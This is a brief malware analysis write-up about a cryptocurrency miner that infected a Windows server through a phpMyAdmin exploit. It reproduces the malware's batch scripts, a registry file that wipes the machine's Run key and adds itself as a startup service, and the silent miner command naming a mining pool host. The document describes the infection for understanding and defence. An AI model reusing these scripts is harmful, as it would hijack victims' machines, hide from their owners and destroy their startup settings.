Miner Spreading over Zmeu

Infected machine cpu at 100% , bin execution dir was C:\appserv\phpmyadmin\ , following the logs it got infected throu that pma exploit


init.exe - SFX archive that calls another SFX arch called sys,exe

sys.exe

run.bat

@ECHO OFF
START /WAIT /B taskkill /F /IM init.exe > nul
ping -n 3 -w 2 127.0.0.1 > nul
call geox.exe -pula
:end

geox..exe

run.bat - sets mode hiden on folder's

@ECHO OFF
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_USE_SYNC_OBJECTS 1
START /WAIT /B regedit /s %SystemRoot%\init\spoolv32\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv32\bash
START /WAIT /B regedit /s %SystemRoot%\init\spoolv64\reg.reg
START /WAIT /B %SystemRoot%\init\spoolv64\bash
START attrib +H +S %SystemRoot%\init

reg.reg / sets itself at startup services
 

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost\Parameters]
"Application"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""
"AppDirectory"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolv"="\"C:\\Windows\\init\\spoolv32\\bash.lnk\""

bash.lnk - also stars miner whith following command , host , user and pass

%SystemRoot%\init\hstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%\init\spoolv32" /HIGH "%SystemRoot%\init\spoolv32\init.exe -o stratum+tcp://stratum.wemineftc.com:80 -O geox.1:x"

init.exe - miner exe also a help command on it .



VirusTotal  - Malwr